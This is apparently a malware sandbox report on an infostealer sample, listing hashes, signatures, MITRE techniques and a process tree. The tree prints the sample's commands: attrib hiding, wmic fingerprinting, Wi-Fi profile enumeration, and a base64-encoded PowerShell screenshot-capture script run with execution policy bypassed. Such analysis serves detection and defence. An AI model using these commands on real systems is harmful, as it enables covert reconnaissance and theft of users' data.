Analysis
-
max time kernel
92s -
max time network
108s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
05-09-2024 12:34
Static task
static1
Behavioral task
behavioral1
Sample
2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe
-
Size
12.1MB
-
MD5
af1cf0d3fd34dd62caa35769977799ed
-
SHA1
bbc3a5d43c05a716fd0ae9d7653a7955b999cf0d
-
SHA256
b3234c030e2baf3ef512e0f847188aa65f0dd0f705cccd0820fa56c0130fca20
-
SHA512
e5f56bea3cc849fe2b5788d3440fea3e52088280e2808ca1c648e539c2354d353066fc1183a6897218af9f09625ca9309e5994daec75a94dd13f79b96597352d
-
SSDEEP
98304:mHjD4g7VTdunZIIe/PTaKT45n4tEG4Y2HDEDeblvVAoOb7u:Y7VTdSe/PT14R4+GxebnAoOb7
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 discord.com 8 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 11 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 4280 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1880 wmic.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 12 Go-http-client/1.1 -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 3008 powershell.exe 3008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe Token: SeIncreaseQuotaPrivilege 712 wmic.exe Token: SeSecurityPrivilege 712 wmic.exe Token: SeTakeOwnershipPrivilege 712 wmic.exe Token: SeLoadDriverPrivilege 712 wmic.exe Token: SeSystemProfilePrivilege 712 wmic.exe Token: SeSystemtimePrivilege 712 wmic.exe Token: SeProfSingleProcessPrivilege 712 wmic.exe Token: SeIncBasePriorityPrivilege 712 wmic.exe Token: SeCreatePagefilePrivilege 712 wmic.exe Token: SeBackupPrivilege 712 wmic.exe Token: SeRestorePrivilege 712 wmic.exe Token: SeShutdownPrivilege 712 wmic.exe Token: SeDebugPrivilege 712 wmic.exe Token: SeSystemEnvironmentPrivilege 712 wmic.exe Token: SeRemoteShutdownPrivilege 712 wmic.exe Token: SeUndockPrivilege 712 wmic.exe Token: SeManageVolumePrivilege 712 wmic.exe Token: 33 712 wmic.exe Token: 34 712 wmic.exe Token: 35 712 wmic.exe Token: 36 712 wmic.exe Token: SeIncreaseQuotaPrivilege 712 wmic.exe Token: SeSecurityPrivilege 712 wmic.exe Token: SeTakeOwnershipPrivilege 712 wmic.exe Token: SeLoadDriverPrivilege 712 wmic.exe Token: SeSystemProfilePrivilege 712 wmic.exe Token: SeSystemtimePrivilege 712 wmic.exe Token: SeProfSingleProcessPrivilege 712 wmic.exe Token: SeIncBasePriorityPrivilege 712 wmic.exe Token: SeCreatePagefilePrivilege 712 wmic.exe Token: SeBackupPrivilege 712 wmic.exe Token: SeRestorePrivilege 712 wmic.exe Token: SeShutdownPrivilege 712 wmic.exe Token: SeDebugPrivilege 712 wmic.exe Token: SeSystemEnvironmentPrivilege 712 wmic.exe Token: SeRemoteShutdownPrivilege 712 wmic.exe Token: SeUndockPrivilege 712 wmic.exe Token: SeManageVolumePrivilege 712 wmic.exe Token: 33 712 wmic.exe Token: 34 712 wmic.exe Token: 35 712 wmic.exe Token: 36 712 wmic.exe Token: SeIncreaseQuotaPrivilege 4908 wmic.exe Token: SeSecurityPrivilege 4908 wmic.exe Token: SeTakeOwnershipPrivilege 4908 wmic.exe Token: SeLoadDriverPrivilege 4908 wmic.exe Token: SeSystemProfilePrivilege 4908 wmic.exe Token: SeSystemtimePrivilege 4908 wmic.exe Token: SeProfSingleProcessPrivilege 4908 wmic.exe Token: SeIncBasePriorityPrivilege 4908 wmic.exe Token: SeCreatePagefilePrivilege 4908 wmic.exe Token: SeBackupPrivilege 4908 wmic.exe Token: SeRestorePrivilege 4908 wmic.exe Token: SeShutdownPrivilege 4908 wmic.exe Token: SeDebugPrivilege 4908 wmic.exe Token: SeSystemEnvironmentPrivilege 4908 wmic.exe Token: SeRemoteShutdownPrivilege 4908 wmic.exe Token: SeUndockPrivilege 4908 wmic.exe Token: SeManageVolumePrivilege 4908 wmic.exe Token: 33 4908 wmic.exe Token: 34 4908 wmic.exe Token: 35 4908 wmic.exe Token: 36 4908 wmic.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 4264 wrote to memory of 1148 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 84 PID 4264 wrote to memory of 1148 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 84 PID 4264 wrote to memory of 712 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 85 PID 4264 wrote to memory of 712 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 85 PID 4264 wrote to memory of 4908 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 87 PID 4264 wrote to memory of 4908 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 87 PID 4264 wrote to memory of 1880 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 88 PID 4264 wrote to memory of 1880 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 88 PID 4264 wrote to memory of 2560 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 89 PID 4264 wrote to memory of 2560 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 89 PID 4264 wrote to memory of 4280 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 91 PID 4264 wrote to memory of 4280 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 91 PID 4264 wrote to memory of 3008 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 94 PID 4264 wrote to memory of 3008 4264 2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe 94 PID 3008 wrote to memory of 2024 3008 powershell.exe 95 PID 3008 wrote to memory of 2024 3008 powershell.exe 95 PID 2024 wrote to memory of 4984 2024 csc.exe 96 PID 2024 wrote to memory of 4984 2024 csc.exe 96 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1148 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe"1⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\2024-09-05_af1cf0d3fd34dd62caa35769977799ed_poet-rat_snatch.exe2⤵
- Views/modifies file attributes
PID:1148
-
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:712
-
-
C:\Windows\System32\Wbem\wmic.exewmic cpu get Name2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\System32\Wbem\wmic.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
PID:1880
-
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID2⤵PID:2560
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4280
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3008 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zj3eib03\zj3eib03.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES947F.tmp" "c:\Users\Admin\AppData\Local\Temp\zj3eib03\CSC7D00C1641BD040B193D0EF4A1224222C.TMP"4⤵PID:4984
-
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cbbf18cd6d289f790acda1010394ecb7
SHA1f5a4aaef869816eb21e12e583c66e8622318f07e
SHA256b4a9146c8a69238524f46345350fb4c40067ae9afdde5a8508c630b1df9aaf12
SHA512505ada7f64813224e68f1648057dccc710dcdba8f502c8b40003ec53b4e1620842506b2fde74f997da4d4c1922f8806d21cceed77a85005907aa9da69c9cb5a3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
426KB
MD5c9790d01596b4b2cec34853330535da3
SHA1f653d96b4f5d2d918c9173ca916c4bb911204df8
SHA25684ddddd869072fcffdd3b398af652d54385e9ccc5038ddda30e6796fb92df41c
SHA512bd30c4fe58bf87fccff2fcbf2daf9e6d1c2e4e1f1c388783606fd72874acea86fe05eb632f33d87ba46aa319488d14c30021f03a86d12fffa3dd2df818952a21
-
Filesize
4KB
MD53362c825aa1254c53764eee57e6c0a91
SHA1babb24fc5615aa546e36f46484430225a2e84595
SHA256312d3d80a31c7ecb73768b2581c57372eb22bfb1d7f94666f93445d9845b7aab
SHA51211baaa062fed09235a1adef6fb14eb8480be40dbb226a0f7945967fee14c633bdab6eb03d1c5a1366aaf225dfb5a9b9a006d39c14f32cde0d689bc86ea24482a
-
Filesize
652B
MD5e97830ff8a24bc37491100ec5721a449
SHA1422562724bd4019bd6fc5c73a8195fe766ef5ea1
SHA2563a577ec6205317a8b037e94809d21d0d52f85a0ae8031078270aa86a72bbd72b
SHA5124a71e2c3a1c4770088a395693b3dc59205da901eb76203262697e08bf646787743b0e4a71150bb47747a31d9a314181a1dca7aad9e5a15dff119201727cecb9f
-
Filesize
1004B
MD5c76055a0388b713a1eabe16130684dc3
SHA1ee11e84cf41d8a43340f7102e17660072906c402
SHA2568a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA51222d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2
-
Filesize
607B
MD5d0fb3ede04746ea05792c27b7a48b85b
SHA1913780237ead4ba2747f0f4864de5ca59fd5ceda
SHA25605152211982ac7fc07ce9a8558b704eac2c3015e75105b1962f4b46945933250
SHA512191b34eb66a12eb1545ba9dc36efb4fa5f83a6f350d893d7cd39123dfee56789c4b5acc4e6dca1bfea0a50301610c2085968dc829071f6da9b08df0ce8e2cfc5